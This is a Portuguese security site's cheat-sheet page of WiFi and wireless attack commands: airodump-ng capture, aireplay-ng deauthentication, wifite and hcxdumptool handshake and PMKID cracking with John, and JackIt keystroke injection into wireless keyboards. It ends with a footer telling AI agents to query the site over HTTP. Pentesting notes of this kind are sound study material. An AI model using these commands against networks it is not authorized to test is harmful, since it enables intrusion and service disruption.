# WiFi

## Tips

```
sudo kismet

sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

sudo airodump-ng -c 11 --bssid=D0:D3:E0:47:B0:01 -w psk wlp0s20f3mon
sudo airodump-ng -c 11 --essid-regex XX-Corporate -w psk wlp0s20f3mon

```

## Deauth

```
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 wlp0s20f3mon

Target client:

sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 -c xx:xx:xx:xx wlp0s20f3mon
```

## wctl

```
:> iwctl

NetworkConfigurationEnabled: disabled
StateDirectory: /var/lib/iwd
Version: 2.15
[iwd]# station 
list  wlan1 
[iwd]# station wlan1 scan
[iwd]# station wlan1 get-networks 
```

<figure><img src="/files/cX3E4zfi1V1vssdNiZ1A" alt=""><figcaption></figcaption></figure>

wifite

```
sudo wifite

WPS:
wifite -e nomedarede
wifite -e rede --pmkid
wifite -c 10 -(hidden SSids)
wifite --wep
wifite --crack

https://github.com/derv82/wifite2
```

## htcxdumptool

```
sudo hcxdumptool -i wlan3 -w output
hcxpcapngtool -o hashcat output --prefix=hash2200 --john=cracking_john --all

Get all the obtained networks:
cat cracking_john | cut -d ":" -f1 | uniq 

john --wordlist=/usr/share/wordlists/wifite.txt cracking_john 
```

## nRFID

```
sudo ./jackit  --script script.txt 

[+] Scanning every 5s CTRL-C when ready.

  KEY  ADDRESS           CHANNELS    COUNT  SEEN         TYPE        PACKET
-----  --------------  ----------  -------  -----------  ----------  -----------------
    1  E7:40:62:76:02          79        2  0:03:49 ago  Amazon HID  02:FC:EF:FF:02:5D
    2  37:DD:35:EA:10  23,41             4  0:01:29 ago  Unknown  02:09:D0:FF:47


[+] Select target keys (1-1) separated by commas, or 'all':  [all]: 1   
[+] Ping success on channel 2
[+] Sending attack to E7:40:62:76:02 [Amazon HID] on channel 2

[+] All attacks completed


```

```
DELAY 500
GUI r 
DELAY 500
STRING notepad.exe  
ENTER 
DELAY 1000 
STRING Hello World! 
```

{% embed url="<https://www.blackhillsinfosec.com/executing-keyboard-injection-attacks/>" %}

## References

{% embed url="<https://tbhaxor.com/evil-twin-wifi-network-using-hostapd-mana/>" %}

{% embed url="<https://www.netprojnetworks.com/setting-up-a-wireless-pentest-lab-part-2/>" %}

{% embed url="<https://www.netprojnetworks.com/wireless-pentest-lab-part-3/>" %}

[ <br>](<&#xD;&#xA;https://tbhaxor.com/evil-twin-wifi-network-using-hostapd-mana/&#xD;&#xA;&#xD;&#xA;https://www.netprojnetworks.com/setting-up-a-wireless-pentest-lab-part-2/&#xD;&#xA;https://www.netprojnetworks.com/wireless-pentest-lab-part-3/>)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.seguranca-informatica.pt/pwnage/wifi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.